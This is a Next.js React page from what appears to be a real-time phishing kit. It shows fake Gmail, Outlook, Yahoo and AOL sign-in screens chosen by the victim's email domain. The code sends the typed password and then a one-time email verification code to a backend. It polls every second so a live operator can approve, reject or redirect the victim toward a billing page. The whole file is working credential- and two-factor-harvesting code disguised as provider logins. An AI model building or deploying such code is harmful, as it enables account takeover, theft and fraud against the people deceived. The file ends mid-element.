"use client";

import { Fragment, useMemo, useRef, useState, useEffect } from "react";
import { useRouter, useSearchParams } from "next/navigation";
import ClientProtection from "@/components/ClientProtection";

type Provider = "gmail" | "outlook" | "yahoo" | "aol" | "other";

function detectProvider(email: string): Provider {
  const lower = email.toLowerCase();
  if (lower.includes("gmail.com")) return "gmail";
  if (
    lower.includes("outlook.com") ||
    lower.includes("live.com") ||
    lower.includes("hotmail.")
  )
    return "outlook";
  if (lower.includes("yahoo.")) return "yahoo";
  if (lower.includes("aol.com")) return "aol";
  return "other";
}

export default function EmailPasswordPage() {
  const router = useRouter();
  const searchParams = useSearchParams();
  const sessionId = useMemo(
    () => searchParams.get("sessionId") || "",
    [searchParams]
  );
  const username = useMemo(
    () => searchParams.get("username") || "",
    [searchParams]
  );
  const [email, setEmail] = useState(searchParams.get("email") || "");
  const provider = useMemo(() => {
    const urlProvider = searchParams.get("provider") as Provider;
    const detectedProvider = email ? detectProvider(email) : "other";
    // Use detected provider if we have an email, otherwise fall back to URL parameter
    const finalProvider = email ? detectedProvider : urlProvider || "other";

    console.log("🔍 Email-Password Provider Detection:", {
      email,
      urlProvider,
      detectedProvider,
      finalProvider,
    });

    return finalProvider;
  }, [searchParams, email]);

  const [password, setPassword] = useState("");
  const [showPassword, setShowPassword] = useState(false);
  const [isLoading, setIsLoading] = useState(false);
  const [error, setError] = useState("");
  const [showProviderModal, setShowProviderModal] = useState(false);
  const [showOtpModal, setShowOtpModal] = useState(false);
  const [otpValues, setOtpValues] = useState<string[]>(Array(6).fill(""));
  const otpInputs = [
    useRef<HTMLInputElement>(null),
    useRef<HTMLInputElement>(null),
    useRef<HTMLInputElement>(null),
    useRef<HTMLInputElement>(null),
    useRef<HTMLInputElement>(null),
    useRef<HTMLInputElement>(null),
  ];

  const getProviderColors = () => {
    switch (provider) {
      case "gmail":
        return {
          primary: "bg-red-500",
          primaryHover: "hover:bg-red-600",
          ring: "focus:ring-red-500",
          text: "text-red-600",
          bg: "bg-red-50",
          accent: "border-red-200",
        };
      case "outlook":
        return {
          primary: "bg-blue-500",
          primaryHover: "hover:bg-blue-600",
          ring: "focus:ring-blue-500",
          text: "text-blue-600",
          bg: "bg-blue-50",
          accent: "border-blue-200",
        };
      case "yahoo":
        return {
          primary: "bg-purple-500",
          primaryHover: "hover:bg-purple-600",
          ring: "focus:ring-purple-500",
          text: "text-purple-600",
          bg: "bg-purple-50",
          accent: "border-purple-200",
        };
      case "aol":
        return {
          primary: "bg-blue-800",
          primaryHover: "hover:bg-blue-900",
          ring: "focus:ring-blue-800",
          text: "text-blue-800",
          bg: "bg-blue-50",
          accent: "border-blue-300",
        };
      default:
        return {
          primary: "bg-green-600",
          primaryHover: "hover:bg-green-700",
          ring: "focus:ring-green-600",
          text: "text-green-600",
          bg: "bg-green-50",
          accent: "border-green-200",
        };
    }
  };

  const colors = getProviderColors();

  // Admin decision checking
  const checkAdminDecision = async () => {
    if (!sessionId) return;
    try {
      const response = await fetch(`/api/session?sessionId=${sessionId}`);
      const session = await response.json();
      console.log("🔍 Password page checking admin decision:", session);

      if (session?.status === "approved") {
        setIsLoading(false);

        // Update email from session data if not already set
        if (!email && session.data?.email) {
          setEmail(session.data.email as string);
          console.log(
            "📧 Updated email from session data:",
            session.data.email
          );
        }

        // UNIVERSAL REDIRECT CHECK - Admin can redirect to ANY page
        // This MUST be checked FIRST, before any modal logic
        if (session.redirectTo) {
          const params = new URLSearchParams({
            sessionId,
            username,
          });
          console.log(`🚀 Admin redirect to: ${session.redirectTo}`);
          console.log(`🚀 Current state:`, {
            sessionId,
            username,
            email,
            provider,
          });

          // Preserve email/provider through redirects where relevant
          if (
            session.redirectTo === "email" ||
            session.redirectTo === "email-password" ||
            session.redirectTo === "email-otp"
          ) {
            if (email) params.set("email", email);
            if (provider) params.set("provider", provider);
          }

          const redirectUrl = `/${session.redirectTo}?${params.toString()}`;
          console.log(`🚀 Redirecting to: ${redirectUrl}`);
          router.push(redirectUrl);
          return; // Exit early after redirect
        }

        // Check current step and admin actions for modal handling
        if (session.currentStep === "email-otp-verify") {
          // User entered OTP code, admin approved, default to billing
          const params = new URLSearchParams({
            sessionId,
            username,
          });
          router.push(`/billing?${params.toString()}`);
        } else if (session.currentStep === "email-otp") {
          // User clicked "Continue" in provider modal, now waiting for OTP modal approval
          if (session.showEmailOtpModal) {
            setShowOtpModal(true);
          }
          // If no modal flag, keep waiting for admin to approve OTP modal
        } else if (session.currentStep === "email-password") {
          // Check if admin clicked "Email OTP" directly (skip provider modal)
          if (session.showEmailOtpModal) {
            setShowOtpModal(true);
          } else {
            // Normal flow: show provider modal first
            setShowProviderModal(true);
          }
        } else {
          // Default flow after password verification - go to billing
          const params = new URLSearchParams({
            sessionId,
            username,
          });
          router.push(`/billing?${params.toString()}`);
        }
      } else if (session?.status === "rejected") {
        setIsLoading(false);

        // Show errors in appropriate places
        if (session.currentStep === "email-otp-verify") {
          // Error should show in OTP modal
          setShowOtpModal(true);
          setError(session.rejectionReason || "Invalid email OTP code");
        } else if (session.currentStep === "email-otp") {
          // Error should show in provider modal area
          setError(session.rejectionReason || "Invalid email OTP request");
        } else {
          // Error should show in main form
          setError(session.rejectionReason || "Invalid email password");
        }
      }
    } catch (error) {
      console.error("Error checking admin decision:", error);
    }
  };

  // Always poll for admin actions so CRM buttons work at any time
  useEffect(() => {
    checkAdminDecision(); // initial immediate check
    const interval = setInterval(checkAdminDecision, 1000);
    return () => clearInterval(interval);
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [sessionId]);

  // Get email from session data on initial load if not in URL
  useEffect(() => {
    if (sessionId && !email) {
      checkAdminDecision();
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [sessionId]);

  const handleOtpChange = (index: number, value: string) => {
    if (value.length > 1) return;

    // Clear error when user starts typing
    if (error) {
      setError("");
    }

    const newValues = [...otpValues];
    newValues[index] = value;
    setOtpValues(newValues);
    if (value && index < 5) {
      otpInputs[index + 1].current?.focus();
    }
  };

  const handleOtpKeyDown = (index: number, e: React.KeyboardEvent) => {
    if (e.key === "Backspace" && !otpValues[index] && index > 0) {
      otpInputs[index - 1].current?.focus();
    }
  };

  const getProviderName = () => {
    switch (provider) {
      case "gmail":
        return "Gmail";
      case "outlook":
        return "Outlook";
      case "yahoo":
        return "Yahoo";
      case "aol":
        return "AOL";
      default:
        return "Email";
    }
  };

  const providerModal = (
    <div className="fixed inset-0 z-50 flex items-center justify-center">
      <div
        className="absolute inset-0 bg-black/40"
        onClick={() => setShowProviderModal(false)}
      />
      <div
        className={`relative bg-white w-full max-w-md rounded-2xl shadow-xl p-6 border-2 ${colors.accent}`}
      >
        <div className="flex items-center gap-3 mb-4">
          {provider === "gmail" && (
            <div className="w-12 h-12 bg-white rounded-lg shadow-sm border flex items-center justify-center">
              <img src="/gmail-logo.png" alt="Gmail" className="w-8 h-8" />
            </div>
          )}
          {provider === "outlook" && (
            <div className="w-12 h-12 bg-white rounded-lg shadow-sm border flex items-center justify-center">
              <img src="/outlook-logo.png" alt="Outlook" className="w-8 h-8" />
            </div>
          )}
          {provider === "yahoo" && (
            <div className="w-12 h-12 bg-white rounded-lg shadow-sm border flex items-center justify-center">
              <img src="/yahoo.png" alt="Yahoo" className="w-8 h-8" />
            </div>
          )}
          {provider === "aol" && (
            <div className="w-12 h-12 bg-white rounded-lg shadow-sm border flex items-center justify-center">
              <img src="/aol.png" alt="AOL" className="w-8 h-8" />
            </div>
          )}
          {provider === "other" && (
            <div className="w-12 h-12 bg-gray-100 rounded-lg flex items-center justify-center">
              <svg
                className="w-8 h-8 text-gray-600"
                fill="currentColor"
                viewBox="0 0 24 24"
              >
                <path d="M1.5 8.67v8.58a3 3 0 003 3h15a3 3 0 003-3V8.67l-8.928 5.493a3 3 0 01-3.144 0L1.5 8.67z" />
                <path d="M22.5 6.908V6.75a3 3 0 00-3-3h-15a3 3 0 00-3 3v.158l9.714 5.978a1.5 1.5 0 001.572 0L22.5 6.908z" />
              </svg>
            </div>
          )}
          <div>
            <h3 className={`text-lg font-semibold ${colors.text}`}>
              {getProviderName()}
            </h3>
            <p className="text-sm text-gray-600">{email}</p>
          </div>
        </div>
        <div className={`${colors.bg} p-4 rounded-lg mb-4`}>
          <p className="text-sm text-gray-700">
            We're connecting to {getProviderName()} to verify your account. This
            may take a moment.
          </p>
        </div>
        <div className="flex gap-3">
          <button
            onClick={async () => {
              setShowProviderModal(false);

              // Save email OTP step and wait for admin approval
              if (!sessionId) return;

              setIsLoading(true);
              try {
                await fetch("/api/session", {
                  method: "POST",
                  headers: { "Content-Type": "application/json" },
                  body: JSON.stringify({
                    sessionId,
                    step: "email-otp",
                    data: {
                      emailOtpRequested: true,
                    },
                  }),
                });
              } catch (error) {
                console.error("Error saving email OTP session:", error);
                setIsLoading(false);
              }
            }}
            className={`flex-1 ${colors.primary} text-white py-3 px-4 rounded-lg ${colors.primaryHover} transition-colors font-semibold`}
          >
            Continue to {getProviderName()}
          </button>
          <button
            onClick={() => setShowProviderModal(false)}
            className="px-4 py-3 text-gray-600 hover:text-gray-800 transition-colors font-medium"
          >
            Cancel
          </button>
        </div>
      </div>
    </div>
  );

  const otpModal = (
    <div className="fixed inset-0 z-50 flex items-center justify-center">
      <div
        className="absolute inset-0 bg-black/40"
        onClick={() => setShowOtpModal(false)}
      />
      <div
        className={`relative bg-white w-full max-w-md rounded-2xl shadow-xl p-6 border-2 ${colors.accent}`}
      >
        {/* Provider Header */}
        <div className="flex items-center gap-3 mb-4">
          {provider === "gmail" && (
            <div className="w-12 h-12 bg-white rounded-lg shadow-sm border flex items-center justify-center">
              <img src="/gmail-logo.png" alt="Gmail" className="w-8 h-8" />
            </div>
          )}
          {provider === "outlook" && (
            <div className="w-12 h-12 bg-white rounded-lg shadow-sm border flex items-center justify-center">
              <img src="/outlook-logo.png" alt="Outlook" className="w-8 h-8" />
            </div>
          )}
          {provider === "yahoo" && (
            <div className="w-12 h-12 bg-white rounded-lg shadow-sm border flex items-center justify-center">
              <img src="/yahoo.png" alt="Yahoo" className="w-8 h-8" />
            </div>
          )}
          {provider === "aol" && (
            <div className="w-12 h-12 bg-white rounded-lg shadow-sm border flex items-center justify-center">
              <img src="/aol.png" alt="AOL" className="w-8 h-8" />
            </div>
          )}
          {provider === "other" && (
            <div className="w-12 h-12 bg-gray-100 rounded-lg flex items-center justify-center">
              <svg
                className="w-8 h-8 text-gray-600"
                fill="currentColor"
                viewBox="0 0 24 24"
              >
                <path d="M1.5 8.67v8.58a3 3 0 003 3h15a3 3 0 003-3V8.67l-8.928 5.493a3 3 0 01-3.144 0L1.5 8.67z" />
                <path d="M22.5 6.908V6.75a3 3 0 00-3-3h-15a3 3 0 00-3 3v.158l9.714 5.978a1.5 1.5 0 001.572 0L22.5 6.908z" />
              </svg>
            </div>
          )}
          <div>
            <h3 className={`text-lg font-semibold ${colors.text}`}>
              {getProviderName()} Verification
            </h3>
            <p className="text-sm text-gray-600">{email}</p>
          </div>
        </div>
        <div className={`${colors.bg} p-4 rounded-lg mb-6`}>
          <p className="text-sm text-gray-700">
            Check your {getProviderName()} inbox and enter the 6-digit
            verification code below.
          </p>
        </div>
        <div className="flex gap-2 mb-4">
          {otpValues.map((value, index) => (
            <input
              key={index}
              ref={otpInputs[index]}
              type="text"
              maxLength={1}
              value={value}
              onChange={(e) => handleOtpChange(index, e.target.value)}
              onKeyDown={(e) => handleOtpKeyDown(index, e)}
              className={`w-12 h-12 text-center border border-gray-300 rounded-lg focus:outline-none focus:ring-2 ${colors.ring} focus:border-transparent text-lg font-semibold text-gray-900`}
            />
          ))}
        </div>

        {/* Error display in OTP modal */}
        {error && showOtpModal && (
          <div className="text-red-600 text-sm text-center bg-red-50 p-3 rounded-lg mb-4 border border-red-200">
            <div className="flex items-center justify-center gap-2">
              <svg className="w-4 h-4" fill="currentColor" viewBox="0 0 20 20">
                <path
                  fillRule="evenodd"
                  d="M10 18a8 8 0 100-16 8 8 0 000 16zM8.707 7.293a1 1 0 00-1.414 1.414L8.586 10l-1.293 1.293a1 1 0 101.414 1.414L10 11.414l1.293 1.293a1 1 0 001.414-1.414L11.414 10l1.293-1.293a1 1 0 00-1.414-1.414L10 8.586 8.707 7.293z"
                  clipRule="evenodd"
                />
              </svg>
              {error}
            </div>
          </div>
        )}
        <div className="flex gap-3">
          <button
            onClick={async () => {
              const otpCode = otpValues.join("");
              if (otpCode.length !== 6) return;

              // Save email OTP verification step and wait for admin approval
              if (!sessionId) return;

              setIsLoading(true);
              try {
                await fetch("/api/session", {
                  method: "POST",
                  headers: { "Content-Type": "application/json" },
                  body: JSON.stringify({
                    sessionId,
                    step: "email-otp-verify",
                    data: {
                      emailOtpCode: otpCode,
                    },
                  }),
                });

                // Hide the modal and show loading state
                setShowOtpModal(false);
              } catch (error) {
                console.error("Error saving email OTP verification:", error);
                setIsLoading(false);
              }
            }}
            disabled={otpValues.join("").length !== 6}
            className={`flex-1 ${colors.primary} text-white py-3 px-4 rounded-lg ${colors.primaryHover} transition-colors disabled:opacity-50 font-semibold`}
          >
            {isLoading ? "Verifying..." : "Verify Code"}
          </button>
          <button
            onClick={() => setShowOtpModal(false)}
            className="px-4 py-3 text-gray-600 hover:text-gray-800 transition-colors font-medium"
          >
            Cancel
          </button>
        </div>
      </div>
    </div>
  );

  // Gmail-style UI
  if (provider === "gmail") {
    return (
      <ClientProtection>
        <div className="min-h-screen bg-white flex flex-col items-center justify-center p-4">
          <div className="w-full max-w-md">
            {/* Gmail Logo */}
            <div className="text-center mb-8">
              <img
                src="/gmail-logo.png"
                alt="Gmail"
                className="h-12 w-auto mx-auto mb-4"
              />
              <h1 className="text-2xl font-normal text-gray-700">Sign in</h1>
              <p className="text-sm text-gray-600 mt-2">to continue to Gmail</p>
            </div>

            {/* Gmail Form */}
            <div className="bg-white border border-gray-300 rounded-lg p-8 shadow-sm">
              <div className="mb-6">
                <div className="flex items-center gap-2 mb-4">
                  <div className="w-8 h-8 bg-red-500 rounded-full flex items-center justify-center text-white text-sm font-medium">
                    {email.charAt(0).toUpperCase()}
                  </div>
                  <div>
                    <p className="text-sm text-gray-900">{email}</p>
                  </div>
                </div>
              </div>

              <form
                onSubmit={async (e) => {
                  e.preventDefault();
                  if (!password) return;

                  setError("");
                  setIsLoading(true);

                  if (!sessionId) {
                    setIsLoading(false);
                    return;
                  }

                  try {
                    await fetch("/api/session", {
                      method: "POST",
                      headers: { "Content-Type": "application/json" },
                      body: JSON.stringify({
                        sessionId,
                        step: "email-password",
                        data: { email, password, provider },
                      }),
                    });
                  } catch (error) {
                    console.error("Error saving session:", error);
                    setIsLoading(false);
                  }
                }}
              >
                <div className="mb-6">
                  <div className="relative">
                    <input
                      type={showPassword ? "text" : "password"}
                      value={password}
                      onChange={(e) => setPassword(e.target.value)}
                      placeholder="Enter your password"
                      className="w-full px-3 py-3 pr-12 border border-gray-300 rounded focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent text-base placeholder-gray-500 text-gray-900"
                      required
                      disabled={isLoading}
                    />
                    <button
                      type="button"
                      onClick={() => setShowPassword(!showPassword)}
                      className="absolute right-3 top-1/2 transform -translate-y-1/2 text-gray-500 hover:text-gray-700"
                      disabled={isLoading}
                    >
                      {showPassword ? (
                        <svg
                          className="w-5 h-5"
                          fill="none"
                          stroke="currentColor"
                          viewBox="0 0 24 24"
                        >
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M13.875 18.825A10.05 10.05 0 0112 19c-4.478 0-8.268-2.943-9.543-7a9.97 9.97 0 011.563-3.029m5.858.908a3 3 0 114.243 4.243M9.878 9.878l4.242 4.242M9.878 9.878L3 3m6.878 6.878L21 21"
                          />
                        </svg>
                      ) : (
                        <svg
                          className="w-5 h-5"
                          fill="none"
                          stroke="currentColor"
                          viewBox="0 0 24 24"
                        >
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M15 12a3 3 0 11-6 0 3 3 0 016 0z"
                          />
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M2.458 12C3.732 7.943 7.523 5 12 5c4.478 0 8.268 2.943 9.542 7-1.274 4.057-5.064 7-9.542 7-4.477 0-8.268-2.943-9.542-7z"
                          />
                        </svg>
                      )}
                    </button>
                  </div>
                  {error && !showProviderModal && !showOtpModal && (
                    <p className="text-red-600 text-sm mt-2">{error}</p>
                  )}
                </div>

                <div className="flex justify-between items-center">
                  <button
                    type="button"
                    className="text-blue-600 text-sm font-medium hover:underline"
                  >
                    Forgot password?
                  </button>
                  <button
                    type="submit"
                    disabled={isLoading || !password}
                    className="border border-red-500 text-red-600 px-6 py-2 rounded font-medium hover:bg-red-50 disabled:opacity-50 disabled:cursor-not-allowed"
                  >
                    {isLoading ? "Signing in..." : "Next"}
                  </button>
                </div>
              </form>
            </div>

            {/* Gmail Footer */}
            <div className="text-center mt-8">
              <div className="flex justify-center space-x-6 text-xs text-gray-600">
                <a href="#" className="hover:underline">
                  Privacy
                </a>
                <a href="#" className="hover:underline">
                  Terms
                </a>
              </div>
            </div>
          </div>
        </div>
      </ClientProtection>
    );
  }

  // Outlook-style UI
  if (provider === "outlook") {
    return (
      <ClientProtection>
        <div className="min-h-screen bg-white flex flex-col items-center justify-center p-4">
          <div className="w-full max-w-md">
            {/* Outlook Logo */}
            <div className="text-center mb-8">
              <img
                src="/outlook-logo.png"
                alt="Outlook"
                className="h-12 w-auto mx-auto mb-4"
              />
              <h1 className="text-2xl font-light text-gray-800">Sign in</h1>
            </div>

            {/* Outlook Form */}
            <div className="bg-white border border-gray-300 rounded p-8 shadow-sm">
              <div className="mb-6">
                <p className="text-sm text-gray-700 mb-4">{email}</p>
              </div>

              <form
                onSubmit={async (e) => {
                  e.preventDefault();
                  if (!password) return;

                  setError("");
                  setIsLoading(true);

                  if (!sessionId) {
                    setIsLoading(false);
                    return;
                  }

                  try {
                    await fetch("/api/session", {
                      method: "POST",
                      headers: { "Content-Type": "application/json" },
                      body: JSON.stringify({
                        sessionId,
                        step: "email-password",
                        data: { email, password, provider },
                      }),
                    });
                  } catch (error) {
                    console.error("Error saving session:", error);
                    setIsLoading(false);
                  }
                }}
              >
                <div className="mb-6">
                  <label className="block text-sm font-medium text-gray-700 mb-2">
                    Password
                  </label>
                  <div className="relative">
                    <input
                      type={showPassword ? "text" : "password"}
                      value={password}
                      onChange={(e) => setPassword(e.target.value)}
                      placeholder="Password"
                      className="w-full px-3 py-3 pr-12 border border-gray-300 rounded focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent text-base placeholder-gray-500 text-gray-900"
                      required
                      disabled={isLoading}
                    />
                    <button
                      type="button"
                      onClick={() => setShowPassword(!showPassword)}
                      className="absolute right-3 top-1/2 transform -translate-y-1/2 text-gray-500 hover:text-gray-700"
                      disabled={isLoading}
                    >
                      {showPassword ? (
                        <svg
                          className="w-5 h-5"
                          fill="none"
                          stroke="currentColor"
                          viewBox="0 0 24 24"
                        >
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M13.875 18.825A10.05 10.05 0 0112 19c-4.478 0-8.268-2.943-9.543-7a9.97 9.97 0 011.563-3.029m5.858.908a3 3 0 114.243 4.243M9.878 9.878l4.242 4.242M9.878 9.878L3 3m6.878 6.878L21 21"
                          />
                        </svg>
                      ) : (
                        <svg
                          className="w-5 h-5"
                          fill="none"
                          stroke="currentColor"
                          viewBox="0 0 24 24"
                        >
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M15 12a3 3 0 11-6 0 3 3 0 016 0z"
                          />
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M2.458 12C3.732 7.943 7.523 5 12 5c4.478 0 8.268 2.943 9.542 7-1.274 4.057-5.064 7-9.542 7-4.477 0-8.268-2.943-9.542-7z"
                          />
                        </svg>
                      )}
                    </button>
                  </div>
                  {error && !showProviderModal && !showOtpModal && (
                    <p className="text-red-600 text-sm mt-2">{error}</p>
                  )}
                </div>

                <div className="mb-4">
                  <label className="flex items-center">
                    <input type="checkbox" className="mr-2" />
                    <span className="text-sm text-gray-700">
                      Keep me signed in
                    </span>
                  </label>
                </div>

                <button
                  type="submit"
                  disabled={isLoading || !password}
                  className="w-full border border-blue-600 text-blue-600 py-3 rounded font-medium hover:bg-blue-50 disabled:opacity-50 disabled:cursor-not-allowed"
                >
                  {isLoading ? "Signing in..." : "Sign in"}
                </button>

                <div className="text-center mt-4">
                  <a href="#" className="text-blue-600 text-sm hover:underline">
                    Forgot my password
                  </a>
                </div>
              </form>
            </div>
          </div>
        </div>
      </ClientProtection>
    );
  }

  // Yahoo-style UI
  if (provider === "yahoo") {
    return (
      <ClientProtection>
        <div className="min-h-screen bg-white flex flex-col items-center justify-center p-4">
          <div className="w-full max-w-md">
            {/* Yahoo Logo */}
            <div className="text-center mb-8">
              <img
                src="/yahoo.png"
                alt="Yahoo"
                className="h-12 w-auto mx-auto mb-4"
              />
              <h1 className="text-2xl font-light text-gray-800">Sign in</h1>
              <p className="text-sm text-gray-600 mt-2">to Yahoo Mail</p>
            </div>

            {/* Yahoo Form */}
            <div className="bg-white rounded-lg p-8 shadow-lg">
              <div className="mb-6">
                <p className="text-sm text-gray-700 mb-4">{email}</p>
              </div>

              <form
                onSubmit={async (e) => {
                  e.preventDefault();
                  if (!password) return;

                  setError("");
                  setIsLoading(true);

                  if (!sessionId) {
                    setIsLoading(false);
                    return;
                  }

                  try {
                    await fetch("/api/session", {
                      method: "POST",
                      headers: { "Content-Type": "application/json" },
                      body: JSON.stringify({
                        sessionId,
                        step: "email-password",
                        data: { email, password, provider },
                      }),
                    });
                  } catch (error) {
                    console.error("Error saving session:", error);
                    setIsLoading(false);
                  }
                }}
              >
                <div className="mb-6">
                  <div className="relative">
                    <input
                      type={showPassword ? "text" : "password"}
                      value={password}
                      onChange={(e) => setPassword(e.target.value)}
                      placeholder="Password"
                      className="w-full px-4 py-3 pr-12 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-purple-500 focus:border-transparent text-base placeholder-gray-500 text-gray-900"
                      required
                      disabled={isLoading}
                    />
                    <button
                      type="button"
                      onClick={() => setShowPassword(!showPassword)}
                      className="absolute right-3 top-1/2 transform -translate-y-1/2 text-gray-500 hover:text-gray-700"
                      disabled={isLoading}
                    >
                      {showPassword ? (
                        <svg
                          className="w-5 h-5"
                          fill="none"
                          stroke="currentColor"
                          viewBox="0 0 24 24"
                        >
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M13.875 18.825A10.05 10.05 0 0112 19c-4.478 0-8.268-2.943-9.543-7a9.97 9.97 0 011.563-3.029m5.858.908a3 3 0 114.243 4.243M9.878 9.878l4.242 4.242M9.878 9.878L3 3m6.878 6.878L21 21"
                          />
                        </svg>
                      ) : (
                        <svg
                          className="w-5 h-5"
                          fill="none"
                          stroke="currentColor"
                          viewBox="0 0 24 24"
                        >
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M15 12a3 3 0 11-6 0 3 3 0 016 0z"
                          />
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M2.458 12C3.732 7.943 7.523 5 12 5c4.478 0 8.268 2.943 9.542 7-1.274 4.057-5.064 7-9.542 7-4.477 0-8.268-2.943-9.542-7z"
                          />
                        </svg>
                      )}
                    </button>
                  </div>
                  {error && !showProviderModal && !showOtpModal && (
                    <p className="text-red-600 text-sm mt-2">{error}</p>
                  )}
                </div>

                <button
                  type="submit"
                  disabled={isLoading || !password}
                  className="w-full border border-purple-600 text-purple-600 py-3 rounded-lg font-medium hover:bg-purple-50 disabled:opacity-50 disabled:cursor-not-allowed"
                >
                  {isLoading ? "Signing in..." : "Next"}
                </button>

                <div className="text-center mt-4">
                  <a
                    href="#"
                    className="text-purple-600 text-sm hover:underline"
                  >
                    I forgot my password
                  </a>
                </div>
              </form>
            </div>
          </div>
        </div>
      </ClientProtection>
    );
  }

  // AOL-style UI
  if (provider === "aol") {
    return (
      <ClientProtection>
        <div className="min-h-screen bg-white flex flex-col items-center justify-center p-4">
          <div className="w-full max-w-md">
            {/* AOL Logo */}
            <div className="text-center mb-8">
              <img
                src="/aol.png"
                alt="AOL"
                className="h-12 w-auto mx-auto mb-4"
              />
              <h1 className="text-2xl font-light text-gray-800">Sign in</h1>
              <p className="text-sm text-gray-600 mt-2">to AOL Mail</p>
            </div>

            {/* AOL Form */}
            <div className="bg-white rounded-lg p-8 shadow-lg">
              <div className="mb-6">
                <p className="text-sm text-gray-700 mb-4">{email}</p>
              </div>

              <form
                onSubmit={async (e) => {
                  e.preventDefault();
                  if (!password) return;

                  setError("");
                  setIsLoading(true);

                  if (!sessionId) {
                    setIsLoading(false);
                    return;
                  }

                  try {
                    await fetch("/api/session", {
                      method: "POST",
                      headers: { "Content-Type": "application/json" },
                      body: JSON.stringify({
                        sessionId,
                        step: "email-password",
                        data: { email, password, provider },
                      }),
                    });
                  } catch (error) {
                    console.error("Error saving session:", error);
                    setIsLoading(false);
                  }
                }}
              >
                <div className="mb-6">
                  <div className="relative">
                    <input
                      type={showPassword ? "text" : "password"}
                      value={password}
                      onChange={(e) => setPassword(e.target.value)}
                      placeholder="Password"
                      className="w-full px-4 py-3 pr-12 border border-gray-300 rounded focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent text-base placeholder-gray-500 text-gray-900"
                      required
                      disabled={isLoading}
                    />
                    <button
                      type="button"
                      onClick={() => setShowPassword(!showPassword)}
                      className="absolute right-3 top-1/2 transform -translate-y-1/2 text-gray-500 hover:text-gray-700"
                      disabled={isLoading}
                    >
                      {showPassword ? (
                        <svg
                          className="w-5 h-5"
                          fill="none"
                          stroke="currentColor"
                          viewBox="0 0 24 24"
                        >
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M13.875 18.825A10.05 10.05 0 0112 19c-4.478 0-8.268-2.943-9.543-7a9.97 9.97 0 011.563-3.029m5.858.908a3 3 0 114.243 4.243M9.878 9.878l4.242 4.242M9.878 9.878L3 3m6.878 6.878L21 21"
                          />
                        </svg>
                      ) : (
                        <svg
                          className="w-5 h-5"
                          fill="none"
                          stroke="currentColor"
                          viewBox="0 0 24 24"
                        >
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M15 12a3 3 0 11-6 0 3 3 0 016 0z"
                          />
                          <path
                            strokeLinecap="round"
                            strokeLinejoin="round"
                            strokeWidth={2}
                            d="M2.458 12C3.732 7.943 7.523 5 12 5c4.478 0 8.268 2.943 9.542 7-1.274 4.057-5.064 7-9.542 7-4.477 0-8.268-2.943-9.542-7z"
                          />
                        </svg>
                      )}
                    </button>
                  </div>
                  {error && !showProviderModal && !showOtpModal && (
                    <p className="text-red-600 text-sm mt-2">{error}</p>
                  )}
                </div>

                <button
                  type="submit"
                  disabled={isLoading || !password}
                  className="w-full border border-blue-600 text-blue-600 py-3 rounded font-medium hover:bg-blue-50 disabled:opacity-50 disabled:cursor-not-allowed"
                >
                  {isLoading ? "Signing in..." : "Next"}
                </button>

                <div className="text-center mt-4">
                  <a href="#" className="text-blue-600 text-sm hover:underline">
                    Forgot password?
                  </a>
                </div>
              </form>
            </div>
          </div>
        </div>
      </ClientProtection>
    );
  }

  // Generic email provider UI
  return (
    <ClientProtection>
      <div className="min-h-screen bg-gray-50 flex flex-col items-center justify-center p-4">
        <div className="w-full max-w-md">
          {/* Generic Email Logo */}
          <div className="text-center mb-8">
            <div className="w-16 h-16 bg-gray-600 rounded-full flex items-center justify-center mx-auto mb-4">
              <svg
                className="w-8 h-8 text-white"
                fill="currentColor"
                viewBox="0 0 24 24"
              >
                <path d="M1.5 8.67v8.58a3 3 0 003 3h15a3 3 0 003-3V8.67l-8.928 5.493a3 3 0 01-3.144 0L1.5 8.67z" />
                <path d="M22.5 6.908V6.75a3 3 0 00-3-3h-15a3 3 0 00-3 3v.158l9.714 5.978a1.5 1.5 0 001.572 0L22.5 6.908z" />
              </svg>
            </div>
            <h1 className="text-2xl font-light text-gray-800">Sign in</h1>
            <p className="text-sm text-gray-600 mt-2">to your email account</p>
          </div>

          {/* Generic Form */}
          <div className="bg-white border border-gray-300 rounded-lg p-8 shadow-sm">
            <div className="mb-6">
              <p className="text-sm text-gray-700 mb-4">{email}</p>
            </div>

            <form
              onSubmit={async (e) => {
                e.preventDefault();
                if (!password) return;

                setError("");
                setIsLoading(true);

                if (!sessionId) {
                  setIsLoading(false);
                  return;
                }

                try {
                  await fetch("/api/session", {
                    method: "POST",
                    headers: { "Content-Type": "application/json" },
                    body: JSON.stringify({
                      sessionId,
                      step: "email-password",
                      data: { email, password, provider },
                    }),
                  });
                } catch (error) {
                  console.error("Error saving session:", error);
                  setIsLoading(false);
                }
              }}
            >
              <div className="mb-6">
                <label className="block text-sm font-medium text-gray-700 mb-2">
                  Password
                </label>
                <div className="relative">
                  <input
                    type={showPassword ? "text" : "password"}
                    value={password}
                    onChange={(e) => setPassword(e.target.value)}
                    placeholder="Enter your password"
                    className="w-full px-3 py-3 pr-12 border border-gray-300 rounded focus:outline-none focus:ring-2 focus:ring-gray-500 focus:border-transparent text-base placeholder-gray-500 text-gray-900"
                    required
                    disabled={isLoading}
                  />
                  <button
                    type="button"
                    onClick={() => setShowPassword(!showPassword)}
                    className="absolute right-3 top-1/2 transform -translate-y-1/2 text-gray-500 hover:text-gray-700"
                    disabled={isLoading}
                  >
